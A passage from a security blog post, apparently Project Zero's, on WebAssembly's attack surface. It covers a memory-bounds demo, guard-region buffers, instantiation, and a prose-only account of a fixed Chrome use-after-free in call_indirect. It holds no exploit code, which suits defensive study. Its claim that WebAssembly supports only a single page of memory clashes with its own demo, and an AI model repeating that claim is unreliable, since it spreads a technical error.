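  0x07, 0x0e, 0x02,                                 // two exports
  0x03, 0x6d, 0x65, 0x6d, 0x02, 0x00,               //   "mem"  -> memory 0
  0x04, 0x6c, 0x6f, 0x61, 0x64, 0x00, 0x00,         //   "load" -> func 0
  0x0a, 0x09, 0x01, 0x07, 0x00,                     // code: one body, no locals
  0x20, 0x00, 0x28, 0x02, 0x00, 0x0b,               //   local.get 0; i32.load align=4 offset=0; end
]);
const PAGE = 65536;

function instantiate() {
  return new WebAssembly.Instance(new WebAssembly.Module(WASM_MEMORY_MODULE), {}).exports;
}

// Performs the i32.load at `addr`. An access outside the current memory size
// traps with a WebAssembly.RuntimeError; no bytes outside the buffer are read.
function tryLoad(exports, addr) {
  try {
    return `ok:${exports.load(addr)}`;
  } catch (e) {
    if (e instanceof WebAssembly.RuntimeError) return 'trap';
    throw e;
  }
}

function demo() {
  const ex = instantiate();
  const before = ex.mem.buffer;
  new Uint8Array(before).set([0x2a, 0, 0, 0], PAGE - 4); // 42 (little-endian) in the last word
  const r = {};
  r.lastWord = tryLoad(ex, PAGE - 4);       // 4-byte load ending exactly at the page end: ok:42
  r.straddle = tryLoad(ex, PAGE - 3);       // crosses the end of the allocated memory: trap
  r.grown = ex.mem.grow(1);                 // returns the previous size in pages: 1
  r.oldDetached = before.byteLength;        // the previous ArrayBuffer is now detached: 0
  r.newLength = ex.mem.buffer.byteLength;   // fresh buffer of 2 pages: 131072
  r.afterGrow = tryLoad(ex, PAGE - 3);      // the same access is now in bounds: ok:0
  try { ex.mem.grow(1); r.growPastMax = 'grew'; }        // would exceed the maximum of 2 pages
  catch (e) { r.growPastMax = e instanceof RangeError ? 'RangeError' : 'other'; }
  return r;
}
```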
One likely reason for this is that a limited number of WebAssembly instructions can access memory, and WebAssembly currently only supports a single page of memory, so the code that accesses memory in a WebAssembly engine is actually quite small. Also, on 64-bit systems, WebAssembly implements memory as safe buffers (also called signal buffers). To understand how safe buffers work, it is important to understand how loads and stores work in WebAssembly. These instructions have two operands, an address and an offset. When memory is accessed, these two operands are added to the pointer to the start of the internal memory of the Memory object, and the resulting location is where the memory access happens. Since both of these operands are 32-bit integers (note that this is likely to change in future versions of WebAssembly), and required to be above zero, a memory access can be at most 0xfffffffe (4GB) outside of the allocated buffer.

Safe buffers work by mapping 4GB into memory space, and then allocating the portion of memory that is actually needed by WebAssembly code as RW memory at the start of the mapped address space. Memory accesses can be at most 4GB from the start of the memory buffer, so all accesses should be in this range. Then, if memory is accessed outside of the allocated memory, it will cause a signal (or equivalent OS error), which is then handled by the WebAssembly engine, and an appropriate out of bounds exception is then thrown in JavaScript. Safe buffers eliminate the need for bounds checks in code, making vulnerabilities due to out-of-bounds access less likely on 64-bit systems. Explicit bounds checking is still required on 32-bit systems, but these are becoming less common.

After the imported objects are loaded, the WebAssembly engine goes through a few more steps to create the Instance Object.
The Elements Section of the WebAssembly binary is used to initialize the Table object, if both of these exist, and then the Data Section of the WebAssembly binary is used to initialize the Memory object, if both exist. Then, the code in the Module is used to create functions, and these functions are exported (attached to a JavaScript object, so they are accessible in JavaScript). Finally, if a start function is specified in the Start Section, it is executed, and then the WebAssembly is ready to run!

```javascript
var b2 = new ArrayBuffer(1000);
var view = new Int8Array(b2, 700); // offset
var mod = new WebAssembly.Module(view);
var i = new WebAssembly.Instance(mod, imports);
i.exports.call_me(); // WebAssembly happens!
```

The final [issue](<https://bugs.chromium.org/p/chromium/issues/detail?id=826434#c1>) we found involves a number of these components. It was discovered and fixed by the Chrome team before we found it, so it doesn’t have a CVE, but it’s still an interesting bug.

This issue is related to the call_indirect instruction which calls a function in the Table object. When the function in the Table object is called, the function can remove itself from the Table object during the call. Before this issue was fixed, Chrome relied on the reference to the function in the Table object to prevent it from being freed during garbage collection. So removing the function from the Table object during a call has the potential to cause the call to use freed memory when it unwinds.

This bug was originally fixed by preventing a Table object from being changed in JavaScript when a WebAssembly call was in progress. Unfortunately, this fix did not completely resolve the issue. Since it is possible to create a WebAssembly Instance in any function, it was still possible to change the Table object by creating an Instance that imports the Table object and has an underlying module with an Elements Section.
When the new Instance is created, the Elements Section is used to initialize the Table, allowing the table to be changed without calling the JavaScript function to change a Table object. The issue was ultimately resolved by holding an extra reference to all needed objects for the duration of the call.

### Execution

WebAssembly is executed by calling an exported function. Depending on the engine, the intermediate bytecode generated when the Module was parsed is either interpreted or used to generate native code via JIT. It’s not uncommon for WebAssembly engines to have bugs where the wrong code is generated for certain sequences of instructions; many such issues have been reported in the bug trackers for the different engines. We didn’t see any such bugs that had a clear security impact though.

### The Future

Overall, the majority of the bugs we found in WebAssembly were related to the parsing of WebAssembly binaries, and this has been mirrored in vulnerabilities reported by other parties. Also, compared to other recent browser features, surprisingly few vulnerabilities have been reported in it. This is likely due to the simplicity of the current design, especially with regards to memory management.

There are two emerging features of WebAssembly that are likely to have a security impact. One is [threading](<https://github.com/WebAssembly/threads>). Currently, WebAssembly only supports concurrency via JavaScript workers, but this is likely to change. Since JavaScript is designed assuming that this is the only concurrency model, WebAssembly threading has the potential to require a lot of code to be thread safe that did not previously need to be, and this could lead to security problems.

WebAssembly [GC](<https://github.com/WebAssembly/gc>) is another potential feature of WebAssembly that could lead to security problems.
Currently, some uses of WebAssembly have performance problems due to the lack of higher-level memory management in WebAssembly. For example, it is difficult to implement a performant Java Virtual Machine in WebAssembly. If WebAssembly GC is implemented, it will increase the number of applications that WebAssembly can be used for, but it will also make it more likely that vulnerabilities related to memory management will occur in both WebAssembly engines and applications written in WebAssembly.

Source: "The Problems and Promise of WebAssembly", Google Project Zero blog, published 2018-08-16, <https://googleprojectzero.blogspot.com/2018/08/the-problems-and-promise-of-webassembly.html>.